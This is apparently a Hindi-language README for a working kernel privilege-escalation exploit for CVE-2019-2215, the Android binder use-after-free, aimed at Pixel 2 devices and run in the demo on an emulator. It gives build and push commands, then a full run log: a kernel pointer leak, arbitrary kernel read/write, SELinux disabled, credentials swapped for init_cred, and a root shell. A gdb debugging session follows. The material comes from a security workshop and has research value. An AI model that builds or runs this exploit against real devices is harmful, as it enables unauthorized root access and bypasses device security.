
Pixel 2 और Pixel 2 XL के लिए CVE-2019-2215 के माध्यम से Temproot
Jann Horn और Google Project Zero के Maddie Stone द्वारा एक प्रूफ-ऑफ-कॉन्सेप्ट पर आधारित।
CloudFuzz की कार्यशाला को विशेष धन्यवाद, जिसने मुझे यह एक्सप्लॉइट लिखने में सक्षम बनाया।
kangtastic को अतिरिक्त संदर्भ स्रोत प्रदान करने के लिए और अधिक धन्यवाद।
एक्सप्लॉइट बनाने के लिए:
NDK_ROOT=~/Android/Sdk/ndk/22.0.7026061 make
एक्सप्लॉइट बनाने और इसे चल रहे डिवाइस पर अपलोड करने के लिए (एंड्रॉइड स्टूडियो एमुलेटर का उपयोग करके):
NDK_ROOT=~/Android/Sdk/ndk/22.0.7026061 make build-exploit push-exploit
उपयोग का उदाहरण:
mohamed@mohamed-G5-5590:~/Desktop/android/CVE-2019-2215$ NDK_ROOT=~/Android/Sdk/ndk/22.0.7026061 make build-exploit push-exploit
Building: cve-2019-2215-exploit
Pushing: cve-2019-2215-exploit to /data/local/tmp
cve-2019-2215-exploit: 1 file pushed, 0 skipped. 480.0 MB/s (4891248 bytes in 0.010s)
File located in: /data/local/tmp/cve-2019-2215-exploit
mohamed@mohamed-G5-5590:~/Desktop/android/CVE-2019-2215$ adb shell
generic_x86_64:/ $ id
uid=2000(shell) gid=2000(shell) groups=2000(shell),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3009(readproc),3011(uhid) context=u:r:shell:s0
generic_x86_64:/ $ /data/local/tmp/cve-2019-2215-exploit
[+] Allocating 4Gb aligned page...
[+] Allocating page
[+] Filling page with 'A's
[+] Dummy page pointer: 0x100000000
[*] Page allocated successfully
[+] Leaking task_struct pointer...
[+] Allocating binder and epoll file descriptors
[+] Creating Pipe
[+] Constructing IOVEC stack
[+] Forking child process
[+] Allocating and linking binder_thread structure
[+] Freeing binder_thread structure
[+] Reallocating binder_thread structure as IOVECs
[+] CHILD Triggering unlink
[+] CHILD Reading 65536 'A's from pipe
[+] CHILD Exiting
[+] Reading leaked task_struct pointer
[+] Leaked task_struct pointer: 0xffff888010731b80
[+] Closing binder and epoll file descriptors
[+] Closing any file descriptors allocated by the function
[*] Leaked task_struct pointer successfully
[+] Getting arbitrary Read-Write permissions...
[+] Allocating binder and epoll file descriptors
[+] Creating socket
[+] Writing junk data to socket
[+] Constructing IOVEC stack
[+] Crafting socket input data
[+] Creating message header object
[+] Forking child process
[+] Allocating and linking binder_thread structure
[+] Freeing binder_thread structure
[+] Reallocating binder_thread structure as IOVECs
[+] CHILD Triggering unlink
[+] CHILD Reading 65536 'A's from pipe
[+] CHILD Exiting
[+] Verifying arbitrary R/W vector
[+] Opening kernel R/W pipe
[+] PID 7359 verified
[+] Closing binder and epoll file descriptors
[+] Closing any file descriptors allocated by the function
[*] Got arbitrary Read-Write permissions successfully
[+] Setting SELinux to permissive mode...
[+] SELinux enforcing flag located at 0xffffffff816acfe8
[+] SELinux enforcing flag already set to zero (permissive mode)
[*] Set SELinux to permissive mode successfully
[+] Updating kernel-space cred structure...
[+] Copying nsproxy pointer from kernel-space
[+] init_nsproxy structure address: 0xffffffff81433ac0
[+] Kernel base address: 0xffffffff80200000
[+] init_cred structure address: 0xffffffff81433c30
[+] init_cred usage count: 0x2
[+] Setting init_cred usage count to: 0x3
[+] Setting task_struct credentials to init_cred
[+] New process UID: 0
[+] Closing kernel R/W pipe
[*] Updated kernel-space cred structure successfully
Exploitation Successful! Opening Privileged Shell...
generic_x86_64:/ # id
uid=0(root) gid=0(root) groups=0(root) context=u:r:kernel:s0
generic_x86_64:/ # exit
Exiting Privileged Shell...
generic_x86_64:/ $ exit
mohamed@mohamed-G5-5590:~/Desktop/android/CVE-2019-2215$
एक्सप्लॉइट को डिबग करने के लिए:
gdb -quiet ./path/to/dist/vmlinux -x commands.gdb
ध्यान दें कि gdb कनेक्ट होने पर एक्सप्लॉइट चलाना इसे बहुत अविश्वसनीय बनाता है, इसलिए केवल आवश्यकता होने पर ही gdb कनेक्ट करें। डिबगिंग सत्र का उदाहरण:
mohamed@mohamed-G5-5590:~/Desktop/android/CVE-2019-2215$ gdb -quiet ../workshop/android-4.14-dev/out/relwithdebinfo/dist/vmlinux -x commands.gdb
Reading symbols from ../workshop/android-4.14-dev/out/relwithdebinfo/dist/vmlinux...
Note: running the exploit while gdb is connected makes it very unreliable, so only connect gdb when needed
warning: while parsing target description (at line 1): Could not load XML document "i386-64bit.xml"
warning: Could not load XML target description; ignoring
native_safe_halt ()
at /home/mohamed/Desktop/android/workshop/android-4.14-dev/goldfish/arch/x86/include/asm/irqflags.h:61
61 }
^C
Program received signal SIGINT, Interrupt.
native_safe_halt ()
at /home/mohamed/Desktop/android/workshop/android-4.14-dev/goldfish/arch/x86/include/asm/irqflags.h:61
61 }
Breakpoint 1 at 0xffffffff80823785: file /home/mohamed/Desktop/android/workshop/android-4.14-dev/goldfish/drivers/android/binder.c, line 4701.
Breakpoint 2 at 0xffffffff802aa69d: file /home/mohamed/Desktop/android/workshop/android-4.14-dev/goldfish/kernel/sched/wait.c, line 50.
Breakpoint 3 at 0xffffffff802aa6d5: file /home/mohamed/Desktop/android/workshop/android-4.14-dev/goldfish/kernel/sched/wait.c, line 53.